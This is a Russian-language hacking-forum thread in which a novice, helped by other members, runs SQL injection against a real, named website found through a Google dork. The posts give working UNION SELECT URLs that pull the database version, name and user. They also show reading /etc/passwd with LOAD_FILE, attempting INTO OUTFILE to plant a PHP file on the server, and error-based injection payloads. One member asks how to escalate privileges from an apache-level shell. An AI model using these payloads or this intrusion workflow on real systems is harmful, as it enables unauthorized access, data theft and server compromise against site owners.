19.10.2015, 10:58
|
|
Познающий
Регистрация: 07.09.2015
Сообщений: 36
Провел на форуме:
12627
Репутация:
0
|
|
Доброго времени суток
я совсем совсем новичек
и так имеем мануал /threads/43966/
затем через гугл ищу
Код:
inurl:news-full.php?id=
нашел ресурс
Код:
http://herorace.ru/news-full.php?id=1
при запросе
Код:
http://herorace.ru/news-full.php?id=1%27
выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/u0093899/data/www/herorace.ru/news-full.php on line70
следуя по мануалу пишу еще один запрос http://herorace.ru/news-full.php?id=1 --
отображает тоже что и просто с 1 - опять же судя по мануалу все ок
дальше следуя по мануалу нужно найти число столбцов я использовал 1' UNION SELECT 1, 2 --
получалось http://herorace.ru/news-full.php?id=1' UNION SELECT 1, 2 --
пробовал после прописывать цифры, 3 и так далее, ошибка со страницы не пропадала, и я решил попробовать с кол-вом полей
1' GROUP BY 2 -- ошибка
1' GROUP BY 10 -- ошибка
1' GROUP BY 100 --
1' GROUP BY 1 -- ошибка - и тут я понял что я наверное что то не так делаю, так как в любом случае полей не может быть меньше чем 1
я решил попробовать 1' GROUP BY 0 -- и тоже ошибка
подскажите что не так делаю ?
спасиобо |
|
|
19.10.2015, 12:18
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от aldemko
↑
подскажите что не так делаю ?
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
http://herorace.ru/news-full.php?id=1+order+by+1+--+ - TRUE
http://herorace.ru/news-full.php?id=1+order+by+7+--+ - FALSE
http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+ - TRUE
Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+
профит
http://herorace.ru/news-full.php?id=...4,user(),6+--+
не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
|
|
|
|
19.10.2015, 12:36
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от aldemko
↑
подскажите что не так делаю ?
спасиобо
Сообщение от Br@!ns
↑
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
http://herorace.ru/news-full.php?id=1+order+by+1+--+
- TRUE
http://herorace.ru/news-full.php?id=1+order+by+7+--+
- FALSE
http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+
- TRUE
Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+
профит
http://herorace.ru/news-full.php?id=...4,user(),6+--+
не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
Хотел добавить - мануалы это НЕ инструкция к конкретным типам сайтов, это всего лишь общий алгоритм действий, а для понимания каждой конкретной ситуации мануалов надо прочитать много. И при поиске по доркам абсолютно не факт, что вы найдете сайты с аналогичными уязвимостями. Причин для этого много - например этот сайт уже ломали и кодер уже пытался "залатать" дыру.
В песочнице, в конкурсе много сайтов живых и уже "расковырянных" - попробуйте с ними "поиграться".
Ну и мое решение к этому вопросу:
Код:
http://herorace.ru/news-full.php?id=-1 union select 1,2,version(),4,database(),6
|
|
|
|
19.10.2015, 12:51
|
|
Познающий
Регистрация: 07.09.2015
Сообщений: 36
Провел на форуме:
12627
Репутация:
0
|
|
и еще такой вопрос в продолжение к этому примеру если можно
допустим я дошел до
Код:
+union+select+1,2,3,4,5,6+--+
значения version() и database() методом ручной вставки в каждй столб вместо цифр вставлять или существует закономерность ?
к примеру я изменив запрос на
Код:
с 1,2,version(),4,database(),6 на 1,2,3,4,5,database()+--+ уже не получаю вывод базы на сайте
PS Хотя нет получаю, только выводятся уже в другом месте - нашел в исходном коде
спасибо
PS 2 показывает что
current user is DBA: False
это значит залиться через уязвимость не получиться и искать другие ресурсы ?
PS 3 /threads/426171/page-5#post-3904335 мой первый самостоятельный сайт
Еще пожалуйста по синтаксису помогите
в общем столбцы узнал, базу узнал, права на запись есть
файл passwd читается
Код:
0+UNION+SELECT+1,2,3,4,5,6,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
нашел предположительные папки на запись
пробую различные состявлять запросы на заливку файла пока не выходит
Код:
0+UNION+SELECT+1,2,3,%27%27,5,6%20INTO%20OUTFILE%20%27/1.php%27,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
затем я еще раз просмотрел почтовый ящик где мне мистер Br@!ns, давал рекомендации и практические примеры
получился запрос 0+UNION+SELECT+1,2,%27%27,4,5,6,7,8,9,10++into+outfile+%27/home/tesis/docs/123.php%27+--++--+
который кстати как по мне работает - только вот в ответ Can't create/write to file '/home/tesis/docs/123.php' (Errcode: 13) - но это уже говорит (я так думаю) о том что сам запрос верно составлен
Теперь возникает вопрос, как искать доступные для записи папки ?
я искал софтом uniscan - Но он показал что эта папка доступна для записи - точнее статус 200. но записаться я туда не могу почему то
Подскажите как правильно искать папки для записи
спасибо
или все же запрос не правильно построил
Вопрос все еще пока для меня актуален
как найти папки для записи ? я в ручную уже за..... перебирать, там куча папок с под папками и прочее
спасибо
PS так же не понятки с @@basedir - показывает что домашняя папка /usr/ - но путь не раскрывает
а ошибка на сайте указывает что сайт находится по /home/tesis/
кому верить ?
может изза не верно укзааного пути, я и не могу файл записать а uniscan не врал и папки действительно разрешены для записи |
|
|
|
19.10.2015, 15:52
|
|
Новичок
Регистрация: 04.06.2015
Сообщений: 22
Провел на форуме:
7285
Репутация:
0
|
|
Сообщение от RedFern.89
↑
проблема в том, что в браузере по прежнему отображается ошибка, через http editor данные вытаскиваются, как быть?
Использовать Burp Suite, символ %20 заменить на пробел.
|
|
|
|
19.10.2015, 19:26
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Сообщение от ButilkaSoka
↑
Использовать Burp Suite, символ %20 заменить на пробел
а автоматизировать весь процесс через него тоже возможно? то есть перебор limit'a?
|
|
|
|
19.10.2015, 19:28
|
|
Познающий
Регистрация: 09.10.2015
Сообщений: 54
Провел на форуме:
19071
Репутация:
10
|
|
Есть linux 2.6.32-042, шелл исполняется под права apache.
В php.ini пустая строка в disable_functions, но не дает менять права на файлы, пробовал через php и через system.
Возможно ли как нибудь повысить права?
Находил вот такой эксплойт _ttps:// www.exploit-db.com/exploits/18411/ , но что-то не догоню как его использовать. |
|
|
|
19.10.2015, 20:13
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Сообщение от ButilkaSoka
↑
Использовать Burp Suite, символ %20 заменить на пробел.
если его заменить на пробел, то запрос прерывается в burp suite на
Код:
/1'+(select!x-~0.FROM(select+(select
|
|
|
|
19.10.2015, 21:33
|
|
Новичок
Регистрация: 04.06.2015
Сообщений: 22
Провел на форуме:
7285
Репутация:
0
|
|
Сообщение от RedFern.89
↑
если его заменить на пробел, то запрос прерывается в burp suite на
Код:
/1'+(select!x-~0.FROM(select+(select
Код:
/news'+(select!x-~0.FROM(select+(select concat() )x)f)='/
|
|
|
|
19.10.2015, 22:06
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Сообщение от ButilkaSoka
↑
/news'+(select!x-~0.FROM(select+(select concat() )x)f)='/
не помогло
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
